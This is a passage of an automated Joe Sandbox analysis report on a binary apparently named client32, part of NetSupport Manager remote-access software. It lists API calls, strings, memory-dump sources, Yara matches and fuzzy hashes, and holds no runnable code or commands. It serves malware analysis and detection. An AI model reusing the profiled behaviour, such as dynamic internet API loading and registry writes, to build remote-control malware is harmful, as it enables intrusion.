                                                                                                                                                                                                    • API ID: Module$FileHandleNamewsprintf
                                                                                                                                                                                                    • String ID: HTCTL32
                                                                                                                                                                                                    • API String ID: 2676591891-1670862073
                                                                                                                                                                                                    • Opcode ID: e901d1cda71495de8d360f69dd924a551d696c952ecaa199ac087fe769dc27a3
                                                                                                                                                                                                    • Instruction ID: 23e8b857df11c21088341ae3ca3138e29810f909bc974bceaf3815421b72b47a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e901d1cda71495de8d360f69dd924a551d696c952ecaa199ac087fe769dc27a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD216534A042488BDB15DFB49D54BEB3BA8DBAB30CFD04098D84A5F181DB70D942C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(BBC4A55B,00000000,?,BBC4A55B,1118736B,000000FF,?,11066188,NSMWClass,BBC4A55B,?,1106DC18), ref: 110311AA
                                                                                                                                                                                                      • Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,BBC4A55B,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                                                                                                      • Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                                                                                                      • Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                                                                                                      • Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCurrentFreeLoadProcProcessVersion
                                                                                                                                                                                                    • String ID: NSMWClass$NSMWClassVista
                                                                                                                                                                                                    • API String ID: 3451282406-889775840
                                                                                                                                                                                                    • Opcode ID: e2128c7920c129d5655456ea2413f3e62162671e8cd6b8b3b6cef9dd89fff3e0
                                                                                                                                                                                                    • Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2128c7920c129d5655456ea2413f3e62162671e8cd6b8b3b6cef9dd89fff3e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?), ref: 1113F7BB
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1113F7F5
                                                                                                                                                                                                      • Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Module$FileHandleNamewsprintf
                                                                                                                                                                                                    • String ID: CLIENT32
                                                                                                                                                                                                    • API String ID: 2676591891-3575452709
                                                                                                                                                                                                    • Opcode ID: c2a49ae62f9c0766f4e7d43f4f0c94c2462831461f20b5692fbc6db37602f5f6
                                                                                                                                                                                                    • Instruction ID: 412e03c58315fe01b93dc4c6e19b7b9e09016b9ccac3efcd19913ad31261d848
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2a49ae62f9c0766f4e7d43f4f0c94c2462831461f20b5692fbc6db37602f5f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40218B3490126A5BE712DBB48D447EAFFA4DF5231CF0040E9E9D58B245EA705944C7D3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,00000000,nsdevcon64.exe,11190240,?,?,?,?,?,?,110FCFEA), ref: 110EB447
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                    • String ID: Error %d setting %s to %s$nsdevcon64.exe
                                                                                                                                                                                                    • API String ID: 3702945584-4188669160
                                                                                                                                                                                                    • Opcode ID: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
                                                                                                                                                                                                    • Instruction ID: cea032128ce82b3eaf0532e478ffcf8d701adba4055b92399446afe6a01fb2d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0401C075A01219AFD700CAA99C89FEAF7ECDB49708F108199F905E7240DA72AE0487A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000000), ref: 1107938E
                                                                                                                                                                                                      • Part of subcall function 11076CD0: GetClientRect.USER32(?,?), ref: 11076D09
                                                                                                                                                                                                      • Part of subcall function 11076CD0: SetRect.USER32(?,00000001,00000001,0000000C,0000000C), ref: 11076D35
                                                                                                                                                                                                      • Part of subcall function 11076CD0: InvalidateRect.USER32(?,?,?,?,?), ref: 11076DA9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11079374
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1107936F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$Invalidate$Client
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3698213978-2830328467
                                                                                                                                                                                                    • Opcode ID: 592da7951c88f8766cb769a5a59c62b899cc8f3ccd205117e395dc582b3b10ac
                                                                                                                                                                                                    • Instruction ID: c3a0bf910db6e25fe1e7fb64db2a563430b1ccec83a3a0d601a616739e002405
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 592da7951c88f8766cb769a5a59c62b899cc8f3ccd205117e395dc582b3b10ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73112175F002299BDB14CF24CD81F9DB3B5AF80318F0085E8E5899B182EB71AD85CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetTimer.USER32(?,00000070,000003E8,00000000), ref: 11077634
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11077617
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077612
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Timer
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2870079774-2830328467
                                                                                                                                                                                                    • Opcode ID: 1cf2391282d06c5e6dadc8e7658894b1d81bb9ab464a16f1bcbcfe8483c112ac
                                                                                                                                                                                                    • Instruction ID: 0a221c4ce37198b8add36136eb661afe262da32aace6fe12586ef86826e2f239
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cf2391282d06c5e6dadc8e7658894b1d81bb9ab464a16f1bcbcfe8483c112ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA116D71A003059FD710CF59C885B4AF7F4FF48358F1086A9EA499B281D7B1E982CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,BBC4A55B,?,?,00000000,00000000,1117DF28,000000FF,?,1107076F,00000000), ref: 110633FE
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateErrorEventExitLastMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$event
                                                                                                                                                                                                    • API String ID: 3621156866-397488498
                                                                                                                                                                                                    • Opcode ID: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
                                                                                                                                                                                                    • Instruction ID: 1e179fcce89b41eecb28e868e3bc3d371cf40be5e8a1825c7246c0f04d2a5f7d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02115AB5A04715AFD720CF59C841B5AFBE8EB44B14F008A6AF8259B780DBB5A6048B90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000000), ref: 11079143
                                                                                                                                                                                                      • Part of subcall function 11076CD0: GetClientRect.USER32(?,?), ref: 11076D09
                                                                                                                                                                                                      • Part of subcall function 11076CD0: SetRect.USER32(?,00000001,00000001,0000000C,0000000C), ref: 11076D35
                                                                                                                                                                                                      • Part of subcall function 11076CD0: InvalidateRect.USER32(?,?,?,?,?), ref: 11076DA9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1107912C
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11079127
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$Invalidate$Client
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3698213978-2830328467
                                                                                                                                                                                                    • Opcode ID: b5ee6c1b061cbe50bfcfeb966dab852632c0ff4c39803aea79d638f30cdc88e6
                                                                                                                                                                                                    • Instruction ID: dc93f9b9db06cc5834772539f873ec566fe60ae0c75361ab6d4a815b93365837
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5ee6c1b061cbe50bfcfeb966dab852632c0ff4c39803aea79d638f30cdc88e6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C113971F0021AAFCB04CF98D985FAEF3B5EB44314F1080A9E545AB241EB75A944CBA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000000), ref: 11079143
                                                                                                                                                                                                      • Part of subcall function 11076CD0: GetClientRect.USER32(?,?), ref: 11076D09
                                                                                                                                                                                                      • Part of subcall function 11076CD0: SetRect.USER32(?,00000001,00000001,0000000C,0000000C), ref: 11076D35
                                                                                                                                                                                                      • Part of subcall function 11076CD0: InvalidateRect.USER32(?,?,?,?,?), ref: 11076DA9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1107912C
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11079127
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$Invalidate$Client
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3698213978-2830328467
                                                                                                                                                                                                    • Opcode ID: f1fc1da89fd49b4448f7976360b5958bbd35e6d8b5c43bd0696d4afb5a966bed
                                                                                                                                                                                                    • Instruction ID: 40633be3568182781611e9f9c5f3781e51ba646c780b44c564ce4a8b334c72e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1fc1da89fd49b4448f7976360b5958bbd35e6d8b5c43bd0696d4afb5a966bed
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF115A71F0021A9FCB04CF98D981FAEF3B5EB44314F108068E505AB241EB75A9508BA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wvsprintf
                                                                                                                                                                                                    • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wvsprintfA.USER32(?,11190240,?), ref: 110CF052
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wvsprintf
                                                                                                                                                                                                    • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 689B4B04
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 689B4B31
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetOpenA
                                                                                                                                                                                                    • API String ID: 199729137-3658917949
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 689B4BA4
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,000000C8,?,689BB53C,00000000,0000002B,?,?), ref: 689B4BCD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetQueryOptionA
                                                                                                                                                                                                    • API String ID: 199729137-3310327128
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(1117B47B,InternetReadFile), ref: 110274D4
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,1102976A,1117B47B,00000000,1102C191,?), ref: 110274FD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetReadFile
                                                                                                                                                                                                    • API String ID: 199729137-1824561397
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetTouchInputInfo), ref: 110357C4
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110357ED
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: GetTouchInputInfo
                                                                                                                                                                                                    • API String ID: 199729137-2645705246
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeferWindowPos.USER32(8B000E80,00000000,F8E85BC0,33CD335E,?,00000000,33CD335E,11076276), ref: 11075563
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11075536
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11075531
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DeferErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 889670253-2830328467
                                                                                                                                                                                                    • Opcode ID: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
                                                                                                                                                                                                    • Instruction ID: 0f53da842d51b2bc1a575ce598d94f232e02cc1422780aacd45dca11e73889ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF01CB661021DAFC704CE89DC80EEBB3EDEB9C754F008119FA19D3250D630E950CBA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017014
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11017039
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: QueueUserWorkItem
                                                                                                                                                                                                    • API String ID: 199729137-2469634949
                                                                                                                                                                                                    • Opcode ID: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
                                                                                                                                                                                                    • Instruction ID: 351e0e434b9127e3d5833c8cdc34dd988e3f21fb5a429389f6b6525592fa6d03
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF08C32A10328AFC310DFA8D844E9BB7A8FB48721F40842AF94087600C630F8008BA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11031034
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11031055
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: ProcessIdToSessionId
                                                                                                                                                                                                    • API String ID: 199729137-2164408197
                                                                                                                                                                                                    • Opcode ID: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
                                                                                                                                                                                                    • Instruction ID: c15e5fa19e0f6f6798f22c3181eac8c4efc8dc53165636b7ac94afd6ac4f5e0b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9E06532A552245FC310DFB5D844E56F7E8EB58762F00C52AF95997200C670A801CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(7658FC40), ref: 11157303
                                                                                                                                                                                                    • GetWindowTextA.USER32(7658FC40,00000000,00000001), ref: 1115731D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: TextWindow$Length
                                                                                                                                                                                                    • String ID: ...
                                                                                                                                                                                                    • API String ID: 1006428111-1685331755
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(1117B47B,InternetCloseHandle), ref: 11027524
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,110297FB,1117B47B), ref: 11027541
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetCloseHandle
                                                                                                                                                                                                    • API String ID: 199729137-3843628324
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CloseTouchInputHandle), ref: 11035784
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110357A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: CloseTouchInputHandle
                                                                                                                                                                                                    • API String ID: 199729137-251360538
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
